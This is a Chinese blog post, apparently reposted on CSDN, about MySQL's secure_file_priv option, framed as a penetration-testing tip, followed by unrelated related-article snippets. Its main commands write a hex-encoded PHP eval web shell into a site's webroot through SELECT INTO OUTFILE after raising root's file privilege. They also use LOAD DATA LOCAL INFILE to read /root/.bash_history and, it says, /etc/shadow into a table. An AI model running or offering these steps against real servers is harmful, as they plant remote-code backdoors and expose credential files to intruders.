mysql flush priv_MYSQL新特性secure_file_priv对读写文件的影响

最新推荐文章于 2021-02-02 05:01:28 发布
最新推荐文章于 2021-02-02 05:01:28 发布
阅读量115 收藏
点赞数
文章标签: mysql flush priv
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_29655399/article/details/113295150
版权

在渗透测试的时候,我们使用into outfile快速写入一句话后门时经常会出现写入不了的情况:

update mysql.user set file_priv='Y' where user='root';

flush privileges;

select concat("'",0x3C3F70687020406576616C28245F504F53545B2778275D293B3F3E) into outfile '../webroot/xxxxxx.php';

update mysql.user set file_priv='N' where user='root';

flush privileges;

不能写入文件原因,可能是MYSQL新特性secure_file_priv对读写文件的影响:

//查看配置项:

SHOW VARIABLES LIKE "secure_file_priv"

3f3a0b7d5ddd6d26596befa5f84ddc55.gif

//如果查到了secure_file_priv的值,再执行下列命令就可以写入文件了:

select 123 into outfile '/var/lib/mysql-files/test1.txt '

//限制mysqld 不允许导入 | 导出:

mysqld --secure_file_prive=null

//限制mysqld 的导入 | 导出 只能发生在/tmp/目录下:

mysqld --secure_file_priv=/tmp/

//不对mysqld 的导入 | 导出做限制:

cat /etc/my.cnf

[mysqld]

secure_file_priv=

//如果没有权限,mysql还有个低权限读文件漏洞,/etc/shadow /root/.bash_history都可以读出来,下面语句测试成功 for MYSQL 5.5.53:

drop table mysql.m1

CREATE TABLE mysql.m1 (code TEXT );

LOAD DATA LOCAL INFILE '/root/.bash_history' INTO TABLE mysql.m1 fields terminated by ''

select * from mysql.m1

大禹昆仑
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql flush priv_mysql主从搭建之诡异事件
weixin_39849548的博客
01-27 93
今天在搭建主从后出现了主库system账号丢失INSERT权限的情况,记录如下主库:system账号权限同root权限,并且mysql库已经删除从库:mysql库存在,无system账号主从同步搭建完成后,start slave开启同步,返回主库测试,发现可以建表,但是不能插入数据,查看system用户权限如下mysql> select * from user where user='sys...
Mysql中的Flush privileges
weixin_34252686的博客
03-28 232
为什么80%的码农都做不了架构师?>>> ...
flush privileges作用
----------------
05-22 1万+
flush privileges 命令本质上的作用是将当前user和privilige表中的用户信息/权限设置从mysql库(MySQL数据库的内置库)中提取到内存里。MySQL用户数据和权限有修改后,希望在”不重启MySQL服务”的情况下直接生效,那么就需要执行这个命令。通常是在修改ROOT帐号的设置后,怕重启后无法再登录进来,那么直接flush之后就可以看权限设置是否生效。而不必冒太大风险。
Mysql中的flush privileges语句
木子生的博客
09-16 1万+
flush privileges语句的作用:就是将当前user表的用户信息和privilige表的权限设置从mysql库(就是mysql数据库的内置库)提取到内存里。一般就是在修改用户信息或者权限后,如果想不重启mysql服务而使修改的内容直接生效,那么就需要执行这个语句。通常是在修改ROOT帐号的设置后,怕重启后无法再登录进来,那么直接flush之后就可以看权限设置是否生效。而不必冒太大风险。
mysql.rar_linux mysql_linux mysql_mysql linux
07-13
在Linux系统中,MySQL是一种广泛使用的开源关系型数据库管理系统,其稳定性和性能备受开发者青睐。本文将深入探讨如何在Linux环境下连接MySQL数据库,并提供相关的示例代码。 首先,确保你的Linux系统已经安装了...
mysql.rar_MYSQL_linux mysql
09-21
MySQL的性能可以通过调整配置文件`my.cnf`来优化,例如修改缓存大小、日志文件等。具体参数需根据实际硬件和业务需求调整。 通过以上步骤,您可以在Linux环境中对MySQL进行基本的管理和操作。然而,MySQL还有许多...
linux-apache-php-mysql.rar_php mysql
最新发布
09-22
安装后,首次启动MySQL服务并设置root用户的密码:`sudo systemctl start mysqld`,然后使用`mysql_secure_installation`脚本来增强安全性。 **整合Apache、PHP和MySQL** 1. 配置Apache以处理PHP文件,编辑`/etc/...
mysql_linux.rar_linux mysql_linux 数据库
09-21
在Linux环境下操作...在压缩包中的“mysql_linux”文件很可能包含具体的步骤指南、脚本示例或配置文件,帮助你更好地理解和实践上述操作。记得解压后仔细阅读,并结合实践来提升你的MySQL在Linux环境下的操作能力。
mysql_best_configuration-master--姜承尧配置5.6-5.7
08-29
10. **innodb_file_per_table**:将每个InnoDB表的数据存储在单独的文件中,有利于空间管理和备份恢复。通常推荐开启。 以上仅是MySQL配置中的冰山一角,实际应用中还需要考虑服务器硬件、工作负载特性以及业务需求...
flush mysql_请教一下,mysql什么时候需要flush privileges?
weixin_33146151的博客
01-18 619
慕桂英4014372必须使用flush privileges的两种情况1、改密码。2、授权超用户。flush privileges 命令本质上的作用是将当前user和privilige表中的用户信息/权限设置从mysql库(MySQL数据库的内置库)中提取到内存里。MySQL用户数据和权限有修改后,希望在"不重启MySQL服务"的情况下直接生效,那么就需要执行这个命令。通常是在修改ROOT帐号的设...
mysql flush priv_MySQL何时执行flush privileges?
weixin_42212792的博客
02-01 435
关注我,获得更多分享。需求背景我们平时在给用户授权grant语句执行后,都习惯性的执行一个命令flush privileges;,但是我发现有时候不执行这个命令,授权语句执行之后,权限验证也是OK的,但是有时候发现不执行这个flush privileges;命令,权限认证还不能通过。那么到底什么情况下需要执行flsh privileges;?什么情况下不需要执行这个命令呢?创建用户当我们创建用户的...
mysql创建新的用户及flush privileges解析
热门推荐
sun4lower的博客
10-14 3万+
1、首先以root用户登录到mysql 2、首先要知道mysql的用户信息是存储在mysql.user(mysql数据库下的user数据表)下的,所以我们只需添加一个用户即可 3、插入之后,并没有完全创建成功,我们可以测试一下,退出之后,用刚才创建的guest02进行登陆,提示错误 4、其实上面的插入操作只是在user表中插入了一条记录,并没有刷新mysql的系统权限相关的数
mysql flush priv_mysql privleges
weixin_30938297的博客
01-27 321
1、权限赋予说明:mysql部署在服务器A上,内网上主机B通过客户端工具连接服务器A以进行数据库操作,需要服务器A赋予主机B操作mysql的权限flush privileges;1.1 在服务器A上进入mysql,假设在服务器A上mysql的账户是root:mysql-uroot-p然后回车键入密码!1.2 赋予主机B操作数据库的权限mysql>grantusageon*.*...
mysql修改用户权限 不生效_MySQL用户和管理权限
weixin_42239752的博客
02-02 1809
前言在MySQL 5.7.24中,关于用户及用户权限的相关信息,都保存在了mysql库中的user表中,可以将user表中大致分为用户列、权限列、安全列、资源控制列这几种。1、用户列user表的用户列包括 Host、 User、password,分别表示主机名、用户名和密码。其中 user和 Host为user表的联合主踺。当用户与服务器之间建立连接时,输入的账户信息中的用户名称、主机名和密码必须...
MySqlflush用法
imzoer的专栏
12-10 2万+
MySQLFLUSH句法 今天仔细看了下Flush语法,同时在工作中也经常使用Flush命令,在这儿汇总下。MySQLFLUSH句法(清除或者重新加载内部缓存) FLUSH flush_option [,flush_option],如果你想要清除一些MySQL使用内部缓存,你应该使用FLUSH命令。为了执行FLUSH,你必须有reload权限。 flush_option 可以是下列任何东西
mysql 用户权限配置(mysql.user表的设置)
高国辉的专栏
10-20 2万+
mysql的用户权限控制,是在mysql.user表中维护的。
mysql忘记root密码拯救方法(flush privileges)
叮咚侠的博客
07-27 1089
原文链接:http://blog.sina.com.cn/s/blog_62449fcf0100y5lu.html   1、结束当前正在运行的mysql进程。 # /etc/init.d/mysql stop 2、用mysql安全模式运行并跳过权限验证。 # /usr/bin/mysqld_safe --skip-grant-tables 3、以root身份登录mysql
flush privileges;的时候error 1033 (hy000) incorrect information in file: './mysql/table_priv.frm'
家门口种果树,不怕馋
04-09 5869
出现这个问题,一定要记录下来,
MySQL Innodb_page_size性能对比:16K vs 8K
"本文主要探讨了MySQL中InnoDB存储引擎的数据页大小对系统性能的影响,通过对innodb_page_size参数设置为16K和8K进行压力测试,对比分析了不同数据页大小下的CPU使用率和读写吞吐量。" 在MySQL数据库中,InnoDB存储...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值